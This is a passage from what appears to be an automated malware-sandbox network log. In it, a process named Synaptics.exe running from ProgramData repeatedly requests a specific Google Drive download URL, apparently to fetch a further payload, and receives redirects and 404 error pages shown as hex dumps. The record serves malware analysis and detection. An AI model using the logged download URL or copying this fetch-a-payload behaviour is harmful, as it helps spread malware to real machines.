                                                                                                                    2025-01-07 12:18:38 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 4a 37 77 44 39 34 78 33 46 42 61 6d 65 34 4c 43 53 73 54 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="kJ7wD94x3FBame4LCSsTZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:38 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    29192.168.2.1149858142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:38 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=i1tMKc6yLjj--7fan0rbLuRCWLfoAgwT3UT9WfUdnlJhpTvE_QyvzKFQpziQUyRFjIPk3RQf0aV54pT7PcIsKeGo8DNIeXtzNpkR3_xuIuxZ4zbg2pSE3qBkLS7ye7gITU8qVAEvbdLRrA4Aa9dGuCsdu7cX7sY-f4c_h-DCw4m1pFS549dDf4B5
                                                                                                                    2025-01-07 12:18:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:38 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ykTR9wtCVJwjr5BUc7BF1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.1149857142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:38 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=i1tMKc6yLjj--7fan0rbLuRCWLfoAgwT3UT9WfUdnlJhpTvE_QyvzKFQpziQUyRFjIPk3RQf0aV54pT7PcIsKeGo8DNIeXtzNpkR3_xuIuxZ4zbg2pSE3qBkLS7ye7gITU8qVAEvbdLRrA4Aa9dGuCsdu7cX7sY-f4c_h-DCw4m1pFS549dDf4B5
                                                                                                                    2025-01-07 12:18:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:38 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3hdZZzS-NQyxmngF_XByMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.1149862142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7R4eBZR9LgN6RPwahPjRarpIy04VerY33x6bBj7utr5fwLWPsDOwOXsKcezHrN6eIE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:39 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CpRBI0bq7Eq7tAqm-ob1YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 39 55 71 6f 55 4a 79 49 4e 61 54 46 48 6a 4d 59 54 69 79 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="n9UqoUJyINaTFHjMYTiyRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.1149864142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:39 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                                                                                                                    2025-01-07 12:18:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:39 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-x2f2UDegADc0vbEwCz7K5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.1149863142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:39 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                                                                                                                    2025-01-07 12:18:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:39 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-gZPGKYEKmUOb7zlO9lM8sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    34192.168.2.1149865142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4UArBQRWaOSX10ZYVCB2aKb-ci0jVUSIxEGelZR2W-Iq6c3YNODJqUa2MBncSscMPV
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:39 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-j49NPYKZUvdIpdyOgMCfsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 50 45 35 48 70 31 59 68 7a 49 39 71 78 32 4e 57 4c 70 42 66 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="ePE5Hp1YhzI9qx2NWLpBfA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    35192.168.2.1149878142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:46 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78
                                                                                                                    2025-01-07 12:18:47 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4BZWX2EUNKVtqtFtH2E7OxWAs1XcLLQi69P1f3kPTgQXgw1y1AEIvS4919Fq05lVmD
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:46 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Lu0ncRGZ_eoNCbHtbJfSmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:47 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:47 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 47 36 53 61 33 67 45 71 70 2d 64 78 73 52 36 75 7a 46 64 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
